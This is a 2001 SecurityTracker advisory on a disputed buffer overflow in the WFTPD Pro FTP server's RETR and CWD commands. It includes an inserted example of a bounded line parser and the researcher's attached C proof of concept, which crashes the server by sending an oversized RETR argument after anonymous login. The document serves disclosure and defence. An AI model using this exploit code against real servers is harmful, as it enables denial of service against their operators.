WFTPD Pro FTP Server for Windows Allows Remote Users to Crash the Server [Vendor Vigorously Disputes This Claim]
SecurityTracker Alert ID: 1001407
SecurityTracker URL: http://securitytracker.com/id/1001407
CVE Reference: GENERIC-MAP-NOMATCH
Updated: Jul 26 2001
Original Entry Date: Apr 23 2001
Impact: Denial of service via network, Execution of arbitrary code via network
Exploit Included: Yes
Version(s): 3.00 R4
Description:
It is reported that WFTPD Pro contains a vulnerability that allows a remote user to crash the FTP server and may allow the remote user to execute arbitrary code on the server. Please note that the vendor vigorously disputes the claim.
The vulnerability is due to a buffer overflow in the RETR and CWD commands.
This vulnerability was apparently reported for version 3.0 R1 on March 3, 2001 and was incorrectly fixed. Similar buffer overflows were apparently reported on September 5, 2000 for version 2.41 RC12 and on October 28, 1999 for version 2.40.
Some demonstration exploit code is contained in the source message.
See the Message History (to be posted shortly) regarding the vendor's dispute of this claim.
Impact:
A remote user can cause the FTP server to crash. It may also be possible for a remote user to execute arbitrary code on the server, but this has not been demonstrated.
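The "incorrectly fixed" point in the Description can be illustrated with a parser that bounds every FTP control line by length instead of relying on buffer size. This is an added example, not WFTPD code and not part of the source message; the function name, the MAX_LINE and MAX_ARG limits and the sample line in main() are assumptions.

```c
#include <string.h>

#define MAX_LINE 512  /* assumed policy limit for one control-channel line */
#define MAX_ARG  255  /* assumed policy limit for a path argument */
/* Reply codes as in RFC 959: 200 okay, 500 syntax error, 501 bad argument. */
enum { FTP_OK = 200, FTP_SYNTAX = 500, FTP_BAD_ARG = 501 };

/*
 * Parse one raw control line (len bytes, not NUL-terminated) into verb/arg.
 * An unbounded strcpy() into a fixed buffer stays unsafe however large the
 * buffer is made. Here each copy is bounded by its destination size and
 * over-long input is rejected with an error reply, never truncated.
 */
int ftp_parse_line(const char *line, size_t len,
                   char *verb, size_t verb_sz,
                   char *arg, size_t arg_sz)
{
    size_t vlen, alen;
    const char *sp;

    if (len < 2 || len > MAX_LINE)
        return FTP_SYNTAX;                 /* length checked before any copy */
    if (line[len - 2] != '\r' || line[len - 1] != '\n')
        return FTP_SYNTAX;                 /* line must end in CRLF */
    len -= 2;
    if (memchr(line, '\0', len) || memchr(line, '\r', len) || memchr(line, '\n', len))
        return FTP_SYNTAX;                 /* no embedded NUL, CR or LF */

    sp = memchr(line, ' ', len);
    vlen = sp ? (size_t)(sp - line) : len;
    alen = sp ? len - vlen - 1 : 0;
    if (vlen == 0 || vlen >= verb_sz)
        return FTP_SYNTAX;
    if (alen > MAX_ARG || alen >= arg_sz)
        return FTP_BAD_ARG;

    memcpy(verb, line, vlen);
    verb[vlen] = '\0';
    if (alen)
        memcpy(arg, sp + 1, alen);
    arg[alen] = '\0';
    return FTP_OK;
}

int main(void) {                           /* constructed sample line */
    char v[8], a[MAX_ARG + 1];
    return ftp_parse_line("CWD pub\r\n", 9, v, sizeof v, a, sizeof a) == FTP_OK ? 0 : 1;
}
```

The caller is expected to read the socket with a bounded line reader and send the returned reply code; a line that fails the check never reaches the RETR or CWD handler.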
Solution:
No solution was available at the time of this entry. The vendor states that the product is not vulnerable.
Vendor URL: www.wftpd.com/
Cause: Boundary error
Underlying OS: Windows (NT)
Message History:
This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
Date: Sun, 22 Apr 2001 16:20:00 -0400
Subject: WFTPD
WFTP is the Win/NT FTP server by Alun Jones, "an author acknowledged as
an expert in FTP and TCP/IP". This advisory pertains to "Professional"
version 3.00 R4, which appears to be the current version. It can be
downloaded from the author's site at <http://www.wftpd.com/>. WFTPD is
released as shareware, and costs $120.
The latest version of WFTPD is vulnerable to a buffer overflow in the
RETR and CWD commands. The overflow can be used to completely disable
the FTP server, and can probably be exploited to run arbitrary code
on the server host.
This problem was already reported for version 3.0 R1 on March 3, 2001
[1], and the author claimed that he had "fixed" the overflow. What he
apparently did was make the buffers bigger; now instead of ~500 characters
overflowing the buffer, it takes ~32K instead.
Similar buffer overflows were reported on September 5, 2000 for version
2.41 RC12 [2], for version 2.40 on October 28, 1999 [3].
The exploit is essentially unchanged from the one posted a month ago;
since <se00020@lion.cc> Windows, version, attached is a UNIX version.
A root exploit can probably be adapted from Alberto Solino's code [4].
Len Budney
References:
[1] http://www.securityfocus.com/templates/archive.pike?list=1&mid=166467
[2] http://www.securityfocus.com/templates/archive.pike?list=1&mid=71096
[3] http://www.securityfocus.com/templates/archive.pike?list=1&mid=32397
[4] http://oliver.efri.hr/~crv/security/bugs/Others/wftpd3.html
Attachment: sploit.c
/* WFTPD Pro 3.00 R4 Buffer Overflow exploit
   written by Len Budney
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#define BUFSIZE 32774
#define CMD "RETR " /* Alt: use "CWD " and set OFFSET to 4. */
#define OFFSET 5
int main(void){
    int sockfd, s;
    struct sockaddr_in victim;
    char buffer[BUFSIZE];
    char exploitbuffer[BUFSIZE]={CMD};
    char recvbuffer[BUFSIZE];
    sockfd=socket(AF_INET,SOCK_STREAM,0);
    if(sockfd == -1) perror("socket");
    victim.sin_family=AF_INET;
    victim.sin_addr.s_addr=inet_addr("192.168.197.129");
    victim.sin_port=htons(21);
    s=connect(sockfd, (struct sockaddr*) &victim, sizeof(victim));
    if(s == -1) perror("connect");
    /* read the banner, then log in anonymously */
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '\0',sizeof(recvbuffer));
    send(sockfd, "USER anonymous\r\n",strlen ("USER anonymous\r\n"),0);
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '\0',sizeof(recvbuffer));
    send(sockfd, "PASS\r\n",strlen ("PASS\r\n"),0);
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '\0',sizeof(recvbuffer));
    /* pad the command argument out to the full buffer and send it */
    memset(exploitbuffer+OFFSET,0x90,sizeof (exploitbuffer)-OFFSET-2);
    sprintf(buffer,"%s\r\n",exploitbuffer);
    send(sockfd, buffer , sizeof(buffer),0);
    recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
    close(sockfd);
    _exit(0);
}